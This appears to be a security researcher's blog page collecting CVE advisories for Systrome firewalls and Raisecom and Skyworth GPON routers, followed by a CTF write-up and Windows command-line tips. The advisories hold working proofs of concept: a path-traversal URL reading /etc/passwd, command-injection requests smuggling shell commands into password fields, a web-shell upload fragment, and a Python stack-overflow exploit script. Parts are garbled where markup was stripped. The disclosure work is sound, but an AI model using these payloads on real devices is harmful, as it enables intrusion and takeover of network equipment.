CVE-2019-7387: Authenticated Arbitrary local file read via path traversal in systorme ISG Products

Posted On // Leave a Comment

Authenticated Arbitrary local file read via path traversal
=============================

Overview
====

* Title : Authenticated Arbitrary local file read via path traversal
* Author: Kaustubh G. Padwad
* CVE-ID: CVE-2019-7387
* Vendor: Systrome Networks (http://systrome.com/about/)
* Products:  1.ISG-600C
          2.ISG-600H
          3.ISG-800W
          4.
* Tested Version: : ISG-V1.1-R2.1_TRUNK-20181105.bin(Respetive for others)
* Severity: High--Critical

Advisory ID
======
KSA-Dev-004

About the Product:
=========

Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and small enterprises, branch interconnection, and chain enterprises.



Description
-------
A local file inclusion vulnerability exists in the web interface of Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W 1.1-R2.1_TRUNK-20180914.bin
devices. When the export function is called from system/maintenance/export.php, it accepts the path provided by the user, leading to path traversal
via the name parameter.


Additional_information
-------------
The php file /system/maintenance/export.php does not properly validate the user input which leads to the path traversal vulberability below is the code sniped for vulnerable code 
if ('isp' == $type)
 $fname = $_GET['name'];


Vulnerability Type
----------
Directory Traversal


Affected Product Code Base
---------------
ISG-600C - ISG-V1.1-R2.1_TRUNK-20181105.bin

Affected Component
-----------
/system/maintenance/export.php

Attack Type
------
Remote

Impact Escalation of Privileges
------------------
true


Impact Information Disclosure
-----------------
true


Attack Vectors
--------
Attacker have to send the crafted request while authenticated

Reference
------
https://s3curityb3ast.github.io/KSA-Dev-004.txt


How to Reproduce: (POC):
--------------

1. visit the url http://device_ip/system/maintenance/export.php?type=isp&name=../../../../../../etc/passwd.

Mitigation
------

This issue is fixed in ISG-V1.1-R2.1_TRUNK-20181229.bin

Disclosure: 
------
10-Dec-2018 Discoverd the Vulnerability
10-DEC-2018 Reported to vendor 
04-JAN-2019 Recived the fixed from vendor
04-JAN-2019 Request for the CVE-ID
4-Feb-2019 CVE Assign.
8-Feb-2019 Advisiory Published

Discoverer /Credits
-----------
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
[Read more]

CVE-2019-7385: Authenticated remote code execution on Multiple Raisecom GPON Devices

Posted On // Leave a Comment
=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad

Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)

Potentially vulnerable

 ISCOM HT803G-U
 ISCOM HT803G-W
 ISCOM HT803G-1GE
 ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-006


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description: 
============
An authenticated shell command injection issue has been discovered in  Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with thefirmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below, The values of the newpass and confpass parameters in /bin/WebMGR are used in a system call in the firmware. Because there is no user input validation, this leads to authenticated code execution on the device.

[Additional_information]

The value of newpass and confpass in /bin/WebMGR  parameter is parse to system call in the Firmware  and since their is no user input validation this leads to authenticated code execution on device

Vulnerability Class:
====================
Authenticated Shell Command Injection


Attack Type
===========
 Local


Impact Code execution
=====================
 true


Attack Vectors
==============
TO exploit this vulnerability one needs to parse the correct request to the device or they one needs to visit the crafted Page


How to Reproduce: (POC):
========================

curl -i -s -k  -X 'POST' \
    -H 'Origin: http://192.168.1.1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
    --data-binary $'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN' \
    'http://192.168.1.1/boaform/formPasswordSetup'

Mitigation
==========

This issue is fixed in latest firmware as per vendor.

Disclosure: 
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor 
10-Dec-2018 Recived confirmation from vendor regarding fix
05-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE Assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
[Read more]

CVE-2019-7384: Authenticated Remote Code Execution in Raisecom GPON Devices

Posted On // 7 comments
=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7384.
Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)

Potentially vulnerable

 ISCOM HT803G-U
 ISCOM HT803G-W
 ISCOM HT803G-1GE
 ISCOM HT803G


Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical

Advisory ID
============
KSA-Dev-005


About the Product:
==================

The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform.


Description: 
============

 An authenticated shell command injection issue has been discovered in  Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version
 ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The value of the fmgpon_loid parameter is used in a system call
 inside the boa binary. Because there is no user input validation, this leads to authenticated code execution on the device.

Additional_information
======================

The value of fmgpon_loid parameter is parse to system call in implimentation of application code inside boa binary and since their is no user input validation this leads to authenticated code execution on device


Vulnerability Class:
====================
Authenticated Shell Command Injection

Attack Type
===========
 Local


Impact Code execution
=====================
 true

Attack Vectors
==============
 To exploit this vulnerability one must have to visit the crafted page or have to parse the proper crafted request to the device



How to Reproduce: (POC):
========================

POST /boaform/admin/formgponConf HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/gpon.asp
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&fmgpon_loid_password=raisecom&fmgpon_ploam_password=1234567890&apply=Apply+Changes&submit-url=%2Fgpon.asp

Mitigation
==========

This issue is fixed in latest firmware as per vendor.

Disclosure: 
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor 
10-Dec-2018 Recived confirmation from vendor regarding fix
04-JAN-2019 Request for the CVE-ID
04-FEB-2018: CVE assigned 

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

[Read more]

CVE-2019-7383 : Remote Code Execution Via shell upload in all systorme ISG products

Posted On // Leave a Comment
=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title : Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7383
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
  1.ISG-600C
  2.ISG-600H
  3.ISG-800W


Tested Version: : ISG-V1.1-R2.1_TRUNK-20181105.bin(Respetive for others)
Severity: High--Critical

Advisory ID
============
KSA-Dev-003


About the Product:
==================

Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and small enterprises, branch interconnection, and chain enterprises.

Description: 
============
An issue was discovered on Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W devices with firmware V1.1-R2.1_TRUNK-20181105.bin.
A shell command injection occurs by editing the description of an ISP file. The file network/isp/isp_update_edit.php does not properly validate user input, which leads to shell command injection via the des parameter.

[Additional_information]

The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which leads to to shell command injection.
below is the vulnerable code snipet  " size="50" maxlength=""/><"

[VulnerabilityType Other]
Authenticated Shell Command Injection


[Affected Component]
The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which leads to to shell command injection.
below is the vulnerable code snippet  "
/usr/local/wwwroot/cmd.php`' the php system shell can then be accessed via browser, e.g: http://device_ip/cmd.php?cmd=ifconfig Mitigation ========== This issue is fixed in ISG-V1.1-R2.1_TRUNK-20181229.bin Disclosure: =========== 10-Dec-2018 Discoverd the Vulnerability 10-DEC-2018 Reported to vendor 04-JAN-2019 Recived the fixed from vendor 04-JAN-2019 Request for the CVE-ID 04-FEB-2019 CVE ID Assign. 08-FEB-2019 Advisiory Published. [Discoverer] * Kaustubh Padwad, * Information Security Researcher * kingkaustubh@me.com * https://s3curityb3ast.github.io/ * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad

[Read more]

CVE-2018-19525 : Account takeover via XSRF in All ISG Series Firewall

Posted On // 1 comment
=====================================================
Authenticated XSRF leads to complete Account Takeover
=====================================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated XSRF leads to complete account takeover in all SYSTORME ISG Products.
CVE ID:- CVE-2018-19525
Author: Kaustubh G. Padwad
Vendor: Systrome Networks (http://systrome.com/about/)
Products:
  1.ISG-600C
  2.ISG-600H
  3.ISG-800W


Tested Version: : ISG-V1.1-R2.1_TRUNK-20180914.bin(Respetive for others)
Severity: High--Critical

Advisory ID
============
KSA-Dev-002


About the Product:
==================

Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the cloud-computing era. It integrates the L2-L7security features of the next-generation firewall, is based on the user identification and application identification and provides the application-layer firewall, intrusion prevention, anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL filtering, and other security functions. It provides the cloud interface. The security cloud management platform based on the big data platform architecture can monitor the network topology and device status in real time, simplifying the online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud gateway is the best access security choice of the middle and small enterprises, branch interconnection, and chain enterprises.

Description: 
============
An issue was discovered on Systrome ISG-600C,ISG-600H, and ISG-800W 1.1-R2.1_TRUNK-20180914.bin devices. There is CSRF via /ui/?g=obj_keywords_add and/ui/?g=obj_keywords_addsave
with resultant XSS because of a lack of csrf token validation.

Additional Information
======================
The web interface of the ISG-Firewalls does not validate the csrftoken,and the ?g=obj_keywords_add page does not properly sanitize the
user input which leads to xss, By combining this two attack we can form the XSRF request which leads to complete account takeover using XSRF.

[Vulnerability Type]
====================
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
========================

  
  
    
[Affected Component] obj_keywords_add ,obj_keywords_addsave, CSRF Vulnerabilities, ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] once victim open the crafted url the device will get compromise Mitigation ========== vendr is working on the same he will submit the solution maybe by december 1st weak. Disclosure: =========== 02-Nov-2018 Discoverd the Vulnerability 15-Nov-2018 Reported to vendor 25-Nov-2018 Requested for CVE/Cve's. 26-Nov-2018 CVE-Assign [Vendor of Product] Systrome Networks (http://systrome.com/about/) credits: ======== * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://s3curityb3ast.github.io/ * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad
[Read more]

CVE-2018-19524 : - Stack Overflow in Multiple Skywoth Gpon Devices

Posted On // 1 comment
========================================================
Unauthenticated  Stack Overflow in Multiple Gpon Devices
========================================================

. contents:: Table Of Content

Overview
========

Title:- StackOverflow in Multiple Skyworth GPON HomeGateways and Optical Network terminals. 
CVE-ID :- CVE-2018-19524
Author: Kaustubh G. Padwad
Vendor: Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products)
Products:
  1.DT741 Converged Intelligent Terminal (G/EPON+IPTV)
 2.DT741 Converged Intelligent Terminal (G/EPON+IPTV)
 3.DT721-cb GPON uplink home gateway (GPON+2FE+1POTS)
 4.DT721-cb GPON Uplink Home Gateway (GPON+2FE+1POTS)
 5.DT741-cb GPON uplink home gateway (GPON+4FE+1POTS+WIFI+USB)
 6.DT741-cb GPON Uplink Home Gateway (GPON+4FE+1POTS+WIFI+USB)
 7.DT741-cbGPON uplink home gateway DT741-cb


Tested Version: : Multiple versions
Severity: High--Critical

Advisory ID
============
KSA-Dev-001

About the Product:
==================

* The (products from above list)  is a high performance GPON access gateway that complies with ITU-G.984 and CTC standards.
* Configure a GPON optical interface, two FEs, one POTS
* Provide Ethernet, VOIP and other interfaces to meet the access requirements of different devices.
* It can provide high-performance broadband access services for home users, individual users, and SOHO small businesses.
* Supports the standard TR069 protocol,which can be flexibly customized according to the carrier network and is compatible with mainstream OLT,software switching and service management platforms

Description: 
============
An issue was discovered on Shenzhen Skyworth
DT741 Converged Intelligent Terminal (G/EPON+IPTV) SDOTBGN1,DT721-cb SDOTBGN1,and DT741-cb SDOTBGN1 devices.
A long password to the Web_passwd function allows remote attackers to cause a denial of service (segmentation fault) or
achieve unauthenticated remote code execution because of control of registers
S0 through S4 and T4 through T7.


Additional Information
========================
The value of password under Web_passwd function is not getting sanitized,so passing too much junk data to the password parameter triggers to the SIGSEGV segmentation fault in device, post research it
was possible to control the registers from S0-S4 and T4-T7.A Successful exploitation could leads to unauthenticated remote code execution on device.


[Affected Component]
web_passwd function inside the boa web server implementation.

------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Denial of Service]
true

------------------------------------------
[Attack Vectors]
Remote code execution by running the poc.py against the target ip address.

[Vulnerability Type]
====================
Buffer Overflow,Exec

How to Reproduce: (POC):
========================

One can use below exploit

import socket
import struct

buf = "POST /cgi-bin/index2.asp  HTTP/1.1\r\nHOST: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.2/cgi-bin/index2.asp\r\nCookie: LoginTimes=0\r\nConnection: Close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1714\r\n\n"
buf+="Username=Bufferoverflow"
buf+="&Logoff=0" 
buf+="&LoginTimes=1"
buf+="&LoginTimes_Zero=0"
buf+="&value_one=1"
buf+="&Password1=xss"
buf+="&Password2=xss"
buf+="&logintype=usr"
buf+="&Password="
buf+="A"*999 #Padding till T4
buf+="T4T4" #T4 Address 0x2BB30D5C kill address based on libc
buf+="T7T7" #T7 sleep address based on libc
buf+="B"*9 #Padding till T6
buf+= "T6T6" #T7 Address Sleep Address Based on libc negetive
buf+="K"*8 #Padding between T6to s0
buf+="S0S0" #S0 Address sleep address boa possitive
buf+="S1S1" #S1 Address Sleep Address Boa negetive
buf+="S2S2" #S2 Address Normal Sleep Adress
buf+="S3S3" #S3Address System Address
buf+="\xA0\x0E\xA2\x18" #return Address
buf+="K"*600


print buf
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 80))
s.send(buf)

Mitigation
==========

No Official mitigation recived from vendor.

[Vendor of Product]
Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products)

Disclosure: 
===========
01-Nov-2018 Discoverd the vulnerability
03-Nov-2018 Reported to vendor (No Response)
13-Nov-2018 follow-up-01 (No reposonse.)
24-Nov-2018 Requested for CVE/Cve's.
26-Nov-2018 CVE-Assign by Mitre

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
[Read more]

NullCON #ackIm CTF 2017 Write-UP(Web-1)

Posted On // 1 comment


we are always excited for #ackIm CTF.

I was palying this CTF from 2k12. and This is the one of the best CTF I ever play.so lets not waste time and start the Journey.


When you login to Portal you find the below details.

Obliviously the first step Is to Hit the WEB challenge coz I assume that it will be easy but that assumption got killed bruatally.


So the challange was

Chris Martin wants to go home. Can you help him get there as soon as possible?
And the URL which ask for the username password.

after looking source code I notice that my scroll bar is too long




In The End i think I Found the Flag


And i think its easy but, it wasnt a flag.

it was base64  sting which gives the md5 hash

Base64 -->; MD5 -->; Coldplayparadise.


This Time I was sure that this must be username/password.


When i put this as username password.

It Gives me

Mismatch in host table! Please contact your administrator for access. IP logged.


A quick idea to add X-Forwded-For: 127.0.0.1 will give you the first flag.




And The Flag is




The flag is: 4f9361b0302d4c2f2eb1fc308587dfd6



Yay so Finally we did it. 

hope you understand that how my first assumption got brutally Killed.


[Read more]

diff alternative for window

Posted On // 1 comment
Dear all


Background :- you must wondering why i am writing this but believe me when you have only windows environment without internet access its hell lot of difficult to find the difference.

Scenario :- you have two csv/text/xls  that having more than 10k Lines and you need to find out the difference in between. condition is that you have only windows machine that too without internet access.

...So after googling on my cellphone i come up with command call fc which save my life ;) from performing too many manual check to automating whole task.


Example:-  We have two file with below data

                     File 1                                                                          File 2 

This data is same                                                                   This data is same
This data is missing


Now See how fc find the difference




Note :- White space make's hell lot of difference in result.





[Read more]

How to get registry value using cmd

Posted On // 1 comment
HI ALL,

While I was working on automation somewhere, I came across situation where I need registry value to validate in script. so hunt began guess simply typing reg command in cmd and wow the command return valid.

Reg /?

So after looking help I understand  that either export will help me or query

Task was to get the firewall setting firewall state of windows, so after googling  I got the below path

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsFirewall\DomainProfile\

Then running reg query path-to-query  got expected out output

C:\>reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsFirewall\Dom
ainProfile\

 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsFirewall\DomainProfile
    DisplayNotification    REG_DWORD    0x1
    DefaultInboundAction    REG_DWORD    0x1
    AllowLocalIPsecPolicyMerge    REG_DWORD    0x1
    AllowLocalPolicyMerge    REG_DWORD    0x1
    DefaultOutboundAction    REG_DWORD    0x0
    EnableFirewall    REG_DWORD    0x0



Simply using findstr will give us expected output 

C:\>reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsFirewall\Dom
ainProfile\ | findstr /i "Enable"

    EnableFirewall    REG_DWORD    0x0





So using reg query you can query any registry key  and using reg export you can export the key into specific files


Below is the quick powershell  script which checks  verify the key value

Script:




Sample Output:



-Kaustubh

[Read more]

How to verify Windows credential using command line

Posted On // 1 comment
HI All,

We were working on some assignment where we had requirement to verify the credential using command line

After fighting a lot with net command I came to conclusion that we can map a domain default share using net use command.

So simple script which try to authenticate with given credential to domain using net use.

Script:-



Note :- password is not masked in script.

Sample Output :-




-Kaustubh

[Read more]